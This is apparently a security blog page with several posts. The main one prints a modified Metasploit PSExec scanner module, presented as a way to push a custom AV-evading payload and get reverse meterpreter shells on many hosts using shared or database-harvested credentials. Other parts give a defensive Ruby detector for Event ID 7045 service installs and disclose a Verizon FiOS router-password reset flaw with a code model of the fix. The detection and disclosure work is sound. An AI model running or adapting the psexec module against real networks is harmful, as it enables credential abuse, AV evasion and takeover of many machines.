Full Disk Encrypted Kali AWS EC2 Instance

I’ve been experimenting with AWS EC2 instances quite a bit lately. I’ve also been tinkering with various aspects of the AWS API, and found it to be very powerful and useful.

I blogged recently about a project where I slightly modified an existing tool called encroot to get a full disk encrypted Kali EC2 instance. Check it out on my employer’s blog.


Use EXE::Custom with psexec scanner

Last year DarkOperator (Carlos Perez) released an awesome auxiliary module for the Metasploit Framework: the PSExec Scanner Auxiliary Module. This module lets you take a set of credentials (or hashes) and run the psexec Metasploit module against a list of hosts. A very handy trick when you have a shared local admin account and want to get shells on a bunch of machines where those admin credentials work.

I simply added a few lines to his script that add the EXE::Custom option, which lets you specify a custom binary to use as the payload rather than have the psexec module create one on the fly. This is useful if you like to use a custom executable that already bypasses AV, since the stock Metasploit payloads often get caught by AV. You set the EXE::Custom option like you would any other option in msf, e.g. “set EXE::Custom /tmp/samba/revshell.exe”.

Be forewarned: Using the custom binary can take a little while longer to pop the box than when you run the module with the default options.

Below is the original script with my edits/additions highlighted. You can download the edited script here.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
#Slightly modified by pipefish to add the EXE::Custom option

require 'msf/core'
require 'rex'



# NOTE: the class header, the mixin includes and the start of initialize were
# lost when this page was extracted (everything between an angle bracket pair
# was dropped); the lines down to 'Name' are reconstructed from the module's
# own structure below (run_host from the Scanner mixin, connect/disconnect
# from the Tcp mixin).
class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Scanner

	def initialize(info = {})
		super(update_info(info,
				'Name'          => 'Auxiliary PSExec Scanner',
				'Description'   => %q{
					PSExec scanner module that will run a psexec attack against a range of hosts
					using either a set of credentials provided or the credential saved in the
					current workspace database.
				},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'Carlos Perez' ],
				'Version'       => '$Revision$'
			))
		register_options(
			[
				OptString.new('SMBUser', [false, 'SMB Username', nil]),
				OptString.new('SMBPass', [false, 'SMB Password', nil]),
				OptString.new('SMBDomain', [true, "SMB Domain", 'WORKGROUP']),
				OptString.new('SHARE',     [ true,
						"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]),
				OptString.new('RHOSTS', [true, 'Range of hosts to scan.', nil]),
				OptInt.new('LPORT', [true, 'Local Port for payload to connect.', nil]),
				OptString.new('LHOST', [true, 'Local Hosts for payload to connect.', nil]),
				OptString.new('PAYLOAD', [true, 'Payload to use against Windows host',
						"windows/meterpreter/reverse_tcp"]),
				OptEnum.new('TYPE', [false, 
						'Type of credentials to use, manual for provided one, db for those found on the database',
						'manual', ['db','manual']]),
				OptString.new('OPTIONS',
				[false, "Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.",
					""]),
				OptString.new('EXE::Custom', [false, 'Use custom exe instead of automatically generating a payload exe', nil]),
				OptBool.new('HANDLER',
					[ false, 'Start an Exploit Multi Handler to receive the connection', true]),
			], self.class)
		# no need for it
		deregister_options('RPORT')
		
	end
	def setup()
		# Set variables
		pay_name = datastore['PAYLOAD']
		lhost    = datastore['LHOST']
		lport    = datastore['LPORT']
		opts     = datastore['OPTIONS']
		

		if datastore['TYPE'] == "db"
			print_status("Using the credentials found in the workspace database")
			collect_hashes()
		else
			print_status("Using the username and password provided")
		end
		@pay = create_payload(pay_name,lhost,lport,opts)
		create_multihand(pay_name,lhost,lport) if datastore['HANDLER']
	end

	# Run Method for when run command is issued
	def run_host(ip)
		if check_port(ip)
			if datastore['TYPE'] == "manual"
				if not datastore['SMBUser'].nil? and not datastore['SMBPass'].nil?
					user = datastore['SMBUser']
					pass = datastore['SMBPass']
					dom = datastore['SMBDomain']
					payload = datastore['PAYLOAD']
					custexe = datastore['EXE::Custom']
					print_status("Trying #{user}:#{pass}")
					psexec(ip,user,pass,dom,payload,custexe)
					return
				end
			else
				@creds.each do |c|
					user,pass = c.split(" ")
					dom = datastore['SMBDomain']
					payload = datastore['PAYLOAD']
					custexe = datastore['EXE::Custom']
					print_status("Trying #{user}:#{pass}")
					psexec(ip,user,pass,dom,payload,custexe)
				end
			end
		else
			return
		end
	end
	
	## Run psexec on a given IP
	def psexec(ip,user,pass,dom,payload,custexe)
		psexec = framework.modules.create("exploit/windows/smb/psexec")
		psexec.share_datastore(@pay.datastore)
		psexec.datastore['PAYLOAD'] = payload
		psexec.datastore['MODULE_OWNER'] = self.owner
		psexec.datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
		psexec.datastore['RHOST'] = ip
		psexec.datastore['SMBUser'] = user
		psexec.datastore['SMBPass'] = pass
		psexec.datastore['SMBDomain'] = dom
		if not datastore['EXE::Custom'].nil?
			psexec.datastore['EXE::Custom'] = custexe
		end
		psexec.datastore['SHARE'] = datastore['SHARE']
		psexec.datastore['RPORT'] = 445
		psexec.datastore['ExitOnSession'] = false
		# Sessions are caught by the multi/handler job started in setup() (when
		# HANDLER is true), so the psexec module must not start its own handler.
		psexec.datastore['DisablePayloadHandler'] = true
		psexec.datastore['EXITFUNC'] = 'process'
		psexec.datastore['VERBOSE'] = true
		psexec.datastore['ForceBlocking'] = true
		psexec.options.validate(psexec.datastore)
		psexec.exploit_simple(
			'LocalInput'	=> self.user_input,
			'LocalOutput'	=> self.user_output,
			'Payload'	=> payload,
			'Target'	=> 0,
			'ForceBlocking'	=> true,
			'RunAsJob'	=> false)
		Rex::ThreadSafe.sleep(4)
	end

	def check_port(ip)
		status = false
		timeout = 1000
		port = 445
		begin
			s = connect(false,
				{
					'RPORT' => 445,
					'RHOST' => ip,
					'ConnectTimeout' => (timeout / 1000.0)
				}
			)
			print_status("#{ip}:#{port} - TCP OPEN")
			status = true
		rescue ::Rex::ConnectionRefused
			vprint_status("#{ip}:#{port} - TCP closed")
		rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
		rescue ::Interrupt
			raise $!
		rescue ::Exception => e
			print_error("#{ip}:#{port} exception #{e.class} #{e} #{e.backtrace}")
		ensure
			disconnect(s) rescue nil
		end
		return status
	end

	def collect_hashes
		type = "smb_hash|password"
		@creds = []
		print_status("Collecting Hashes from the DB")
		framework.db.workspace.creds.each do |cred|
			if cred.active and cred.ptype =~ /#{type}/ and cred.user !~ /(SUPPORT|HelpAssistant|TsInternetUser|IWAM|Guest)/
				@creds << "#{cred.user} #{cred.pass}"
			end
		end
	end

	# NOTE: the end of collect_hashes, create_payload and most of create_multihand
	# were lost when this page was extracted (the text between '<<' above and the
	# next '>' was dropped); the code from here down to 'Payload' is reconstructed
	# from the calls made in setup() and from the handler tail that survived.

	# Build the payload object and apply any extra 'opt=val,opt=val' OPTIONS
	def create_payload(name, lhost, lport, opts = "")
		pay = framework.payloads.create(name)
		pay.datastore['LHOST'] = lhost
		pay.datastore['LPORT'] = lport
		if not opts.nil? and not opts.empty?
			opts.split(",").each do |o|
				opt, val = o.split("=", 2)
				pay.datastore[opt] = val
			end
		end
		pay.options.validate(pay.datastore)
		return pay
	end

	# Start an exploit/multi/handler job to catch the incoming sessions
	def create_multihand(pay_name, lhost, lport)
		mul = framework.modules.create("exploit/multi/handler")
		mul.share_datastore(@pay.datastore)
		mul.datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
		mul.datastore['PAYLOAD'] = pay_name
		mul.datastore['LHOST'] = lhost
		mul.datastore['LPORT'] = lport
		mul.datastore['EXITFUNC'] = 'process'
		mul.datastore['ExitOnSession'] = false
		if mul.options.validate(mul.datastore)
			print_status("Starting exploit multi handler")
			mul.exploit_simple(
					'Payload'     => mul.datastore['PAYLOAD'],
					'LocalInput'  => self.user_input,
					'LocalOutput' => self.user_output,
					'RunAsJob'    => true
				)
		else
			print_error("Could not start handler!")
		end
	end

end
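One point worth making from the defender's side: a custom binary changes what the endpoint AV sees, but not the artifact the technique leaves on the target. The psexec module copies its executable into the ADMIN$ share (the Windows directory) and registers it as a service, and the Service Control Manager writes every new service to the System log as Event ID 7045 with the service name and image path, whatever the binary is. The script below is an added example, not code from this post, from Carlos Perez's module or from Metasploit. It scans a few constructed JSON-lines event records and flags 7045 entries whose service name and binary are both random-looking 8-letter names sitting in the Windows root, plus the fixed PSEXESVC name used by Sysinternals PsExec. The record layout, the field names and the 8-letter heuristic (an assumption that Metasploit's psexec of this era named the service and the dropped exe with Rex::Text.rand_text_alpha(8)) are assumptions made for the example.

```ruby
require 'json'

# Constructed sample System-log records in JSON-lines form (one event per line);
# the EventID/Computer/ServiceName/ImagePath field names are an assumption of
# this example, not a documented schema.
SAMPLE_EVENTS = <<~'LOG'
  {"EventID":7045,"Computer":"WS01","ServiceName":"Spooler","ImagePath":"C:\\Windows\\System32\\spoolsv.exe","AccountName":"LocalSystem"}
  {"EventID":7045,"Computer":"WS02","ServiceName":"MqTxwLrZ","ImagePath":"%SYSTEMROOT%\\MqTxwLrZ.exe","AccountName":"LocalSystem"}
  {"EventID":7045,"Computer":"WS03","ServiceName":"PSEXESVC","ImagePath":"%SystemRoot%\\PSEXESVC.exe","AccountName":"LocalSystem"}
  {"EventID":7036,"Computer":"WS02","ServiceName":"MqTxwLrZ","Message":"entered the running state."}
LOG

# Assumption: the Metasploit psexec module of this era named both the service
# and the dropped exe with 8 random letters (Rex::Text.rand_text_alpha(8)).
RANDOM_NAME = /\A[a-z]{8}\z/i

# True when the image lives directly in the Windows directory, which is where
# a file copied into the ADMIN$ share lands.
def windows_root?(dir)
  d = dir.downcase
  d == '%systemroot%' || d == '%windir%' || d.match?(%r{\A[a-z]:/windows\z})
end

# Reasons a single 7045 record looks like a PsExec-style service install
# (an empty array means nothing to report).
def service_install_reasons(ev)
  reasons = []
  return reasons unless ev['EventID'] == 7045
  path = ev['ImagePath'].to_s.tr('\\', '/')
  stem = File.basename(path).sub(/\.exe\z/i, '')
  reasons << 'PSEXESVC service binary (Sysinternals PsExec)' if stem.casecmp?('psexesvc')
  if windows_root?(File.dirname(path)) && stem.match?(RANDOM_NAME) && ev['ServiceName'].to_s.match?(RANDOM_NAME)
    reasons << 'random 8-letter service and binary dropped in the Windows root (ADMIN$)'
  end
  reasons
end

# Scan JSON-lines text and return one finding per suspicious service install.
def detect(log_text)
  log_text.each_line.map do |line|
    line = line.strip
    next if line.empty?
    ev = JSON.parse(line)
    reasons = service_install_reasons(ev)
    next if reasons.empty?
    { computer: ev['Computer'], service: ev['ServiceName'], path: ev['ImagePath'], reasons: reasons }
  end.compact
end

if __FILE__ == $0
  detect(SAMPLE_EVENTS).each do |f|
    puts "#{f[:computer]}: service #{f[:service]} (#{f[:path]}) -> #{f[:reasons].join('; ')}"
  end
end
```

Run against the sample, WS01's Spooler install is ignored and WS02 and WS03 are reported. On a real estate the same logic fed from forwarded System logs catches the custom-binary case exactly as well as the stock payload, because it keys on the service registration rather than on the file contents.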

Home Network Users Beware

You can reset the router password of most stock setups of Verizon’s FiOS Internet service without authorization, and without physical access. That is a bold statement, but one that I have found to be true every single time I test it out. And if I’ve found this out, chances are good that plenty of others have as well. I have called and emailed Verizon several times about this issue and have gotten a mix of “I didn’t know that was possible” to “Yeah, that’s a value-add feature for our customers”. Either way, the big V has not addressed the problem. My hope is that someone brings this up to the President of Verizon Security Awesomeness and says “Uhh, we may need to rethink this one!”.

For brevity’s sake I’ll sum it up here: you can download the Verizon In Home Agent and reset the router password of any FiOS router. The only requirement is that you be on the same network as the router. No authentication required (see picture; note it doesn’t ask for the old password!).

The long version follows.

I found this issue out by accident, after I moved. I had Verizon come out and transfer my FiOS service to my new address. The tech was doing the usual stuff, then said “Now I have to verify connectivity. Do you have a computer we can use to test it out?”. I ambled up and set my laptop in front of him, which was running Ubuntu. The tech instantly stated, “Uh, we don’t officially support machines unless they’re a Windows PC.” I browsed the Internet and was satisfied. He said, “We have to run a program to test connectivity or I don’t get credit for the install”. The “program” in question was an exe. ~Sigh~ Ok, fine, so I booted up my Windows 7 VM. He plugged in a thumb drive and fired off some exe. Now, I won’t even go into the fact that I would usually NEVER let anyone plug a random thumb drive into my PC and run some exe, but this was a VM and I wanted him to finish, so I held my tongue. The exe launched some apps that looked like they were testing different aspects of my FiOS service. But for all I know I was being enrolled in a botnet. But that’s neither here nor there.

When all the colors on the screen showed green he said “Now I’m going to show you about Verizon’s In Home Agent”. I didn’t feel like dealing with it, but he was in full-on canned speech mode. “It lets you diagnose issues, collect log info for support and do some other neat stuff, like reset the router password.” Fine, fine, get out, thank you, enjoy your life tech-guy. When he left I went to log in to the router with the password he had left me (Password1). Of course wireless security was set to what Verizon always sets it to: WEP. I went in, changed it to WPA2 PSK and changed the passphrase, then I went to change the password but accidentally closed the window before I did. Shucks… but wait… the In Home Agent screen was up and the option “Change Password” was sitting right there. Ok, I’ll bite. So I clicked it. It asked for a new password. It DID NOT ask for an old one. Hmm, so I typed in a new password. Then I tried to log into the router. My new password worked. Interesting. Well, maybe since the application was running earlier it cached the first password when I logged into the site… I dunno how, but maybe. So I rebooted, used the In Home Agent and changed the password to something new, without being prompted for the old one. Fascinating. I went to my neighbor later and asked if I could test something out. They owe me since I have fixed their computers for free, so they let me tinker. They let me connect to their network (which was WEP) and I ran the In Home Agent. I then proceeded to change their router password without being asked for the original. Yikes.

My first call to Verizon, I explained how most times Verizon techs come out for a FiOS move or install they set wifi security to WEP. I was told this was because not all customers’ computers support WPA/WPA2, and they want to ensure that their customers can use their wifi. Ok, but WEP can be cracked in minutes. There have been dozens of articles published on how to do it. But that’s not the worst part. If I get on to a network (crack their WEP or am allowed in) all I have to do is run the In Home Agent and I can reset their router password. I don’t have to MiTM them, nor find vulns in their PCs to exploit; I can just own them at their gateway. Redirect DNS where I want, set new routes. “Hmm, I’ll inform my manager about your concerns”. That’s all I got the first call. Several other calls and several emails later there has been no update to the In Home Agent.

I did get one tech who said “Well, I mean you know, if you’re on the network we figure you’re allowed to be… so you can reset the password I guess”. Ok, but if I crack the WEP I got on without being allowed to be… or if I’m a parent and I want to set parental controls or filters, all my kid has to do is reset my router password and log in… ~sigh~ it doesn’t get through.
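The design flaw here is a single missing check: a password change that never asks for the current password is a password reset available to anyone who can reach the interface. As an added illustration (not code from this post, and not the In Home Agent's actual code, whose internals the post does not show), here is a minimal Ruby model of a router admin account with both behaviours side by side. The class name, the PBKDF2 parameters and the 12-character minimum are assumptions made for the example.

```ruby
require 'openssl'
require 'securerandom'

# Minimal model of a router admin account, constructed for this example.
class RouterAdmin
  ITERATIONS = 100_000   # PBKDF2 work factor (assumption for the example)
  MIN_LENGTH = 12        # minimum new-password length (assumption for the example)

  def initialize(initial_password)
    @salt = SecureRandom.random_bytes(16)
    @hash = derive(initial_password)
  end

  # The behaviour the post describes: a new password is accepted with no proof
  # of the old one, so anyone who can reach the interface takes over the account.
  def reset_without_old!(new_password)
    @hash = derive(new_password)
    true
  end

  # Hardened form: re-authenticate with the current password before changing it,
  # and refuse weak replacements.
  def change_password(current_password, new_password)
    return false unless verify(current_password)
    return false if new_password.length < MIN_LENGTH
    @hash = derive(new_password)
    true
  end

  # Compare derived hashes in constant time so a wrong guess is not
  # distinguishable by how long the comparison takes.
  def verify(password)
    candidate = derive(password)
    return false unless candidate.bytesize == @hash.bytesize
    candidate.bytes.zip(@hash.bytes).inject(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
  end

  private

  def derive(password)
    OpenSSL::PKCS5.pbkdf2_hmac(password, @salt, ITERATIONS, 32, OpenSSL::Digest.new('sha256'))
  end
end

if __FILE__ == $0
  router = RouterAdmin.new('Password1')
  puts "change with wrong old password: #{router.change_password('guess', 'CorrectHorseBattery1')}"
  puts "change with right old password: #{router.change_password('Password1', 'CorrectHorseBattery1')}"
  router.reset_without_old!('anyone-on-the-lan')
  puts "after unauthenticated reset, attacker's password works: #{router.verify('anyone-on-the-lan')}"
end
```

The hardened path is the one the post is asking for: whoever triggers the change must already know the password, so a guest on the LAN (or someone who cracked the WEP key) cannot silently lock the owner out of their own gateway.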

I guess a bullet point here is (obviously) don’t use WEP, and even if you use WPA2, be careful who you allow on your network.  Any guest on your network can reset your router password.  And, how often do you log in and check that, anyways?

Hopefully having this on the Interwebs will get them to wake up.  Because a concerned customer’s harassment apparently can’t.